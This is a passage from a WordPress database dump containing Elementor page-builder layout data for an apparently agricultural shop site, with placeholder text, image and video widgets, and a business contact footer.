here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9029,1548,'_elementor_page_assets','a:0:{}'),(9031,1549,'_elementor_edit_mode','builder'),(9032,1549,'_elementor_template_type','wp-page'),(9033,1549,'_elementor_version','3.7.8'),(9034,1549,'_wp_page_template','elementor_canvas'),(9035,1549,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9036,1549,'_elementor_page_assets','a:0:{}'),(9038,1550,'_elementor_edit_mode','builder'),(9039,1550,'_elementor_template_type','wp-page'),(9040,1550,'_elementor_version','3.7.8'),(9041,1550,'_wp_page_template','elementor_canvas'),(9042,1550,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"s